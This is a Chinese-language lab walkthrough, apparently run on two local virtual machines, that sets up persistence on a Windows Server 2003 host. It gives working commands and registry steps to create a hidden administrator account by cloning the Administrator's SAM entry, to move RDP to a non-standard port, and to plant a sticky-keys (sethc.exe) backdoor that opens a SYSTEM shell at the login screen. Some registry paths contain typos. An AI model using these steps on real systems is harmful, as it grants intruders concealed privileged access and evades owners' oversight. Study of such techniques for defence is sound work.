创建隐藏账户＋注册表改3389＋获取shell

主机1windows server 2003 IP：192.168.163.132

主机2win7 ip：192.168.163.128

查看IP Ipconfig

查看端口netstat –ano netstat –ano | find “3389”

查看用户net user

创建用户隐藏用户net user cs$ cs /add

提升权限net localgroupAdministrators cs$ /add

进入注册表隐藏新创建的用户cs$ ctrl+r输入regedit

查看Administrator的类型为0x1f4所以找到User下级的000001f4点击F复制里面的内容

查看新用户cs$的类型为0x3eb所以找到User下级的000003eb将刚刚复制的内容全选粘贴到里面

将000003eb和cs$导出

查看一下

由于刚刚删除了所以登录失败

利用注册表修改3389端口

输入"regedit"，打开注册表，进入以下路径： [HKEY_LOCAL_MACHINE\SYSTEM\ CurrentControlSet\Control\TerminalServer\ Wds\rdpwd\Tds\tcp]， PortNamber默认值是3389（改为十进制显示），修改成所希望的端口，再打开[HKEY_LOCAL_MACHINE\SYSTEM\CurrentContro1Set\Control\TenninalServer\WinStations\RDP-Tcp] ，将PortNumber的值（默认是3389） 关闭注册表编辑器后重启计算机，即可生效。 注： 必需重启后才可生效设置

依次运行刚刚导出的注册表文件

查看修改的效果

设置shift后门

打开C:\WINDOWS\system32路径

找到cmd.exe、setch.exe、或者其他，将其拷贝出来备份一下

在cmd窗口，敲打命令如下：

copy c:\windows\explorer.exec:\windows\system32\sethc.exe

copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe

attrib c:\windows\system32\sethc.exe +h

attrib c:\windows\system32\dllcache\sethc.exe +h

用copy命令将explorer.exe复制为setch.exe，这样在登陆界面下连续按5次shift就可以调出程序管理系统了，就获取了系统权限。

(也可以将explorer.exe 改为cmd.exe，这样子这样在登陆界面下连续按5次shift就可以调出cmd命令了，就获取了shell权限。)

依次运行导出的注册表添加隐藏用户

效果图

在win7进行远程连接测试

测试3389是否开启

打开win7的telnet服务

由于3389端口改为6666端口所以连接失败

进行远程连接

测试shift后门

登录成功

END

--------------------------------------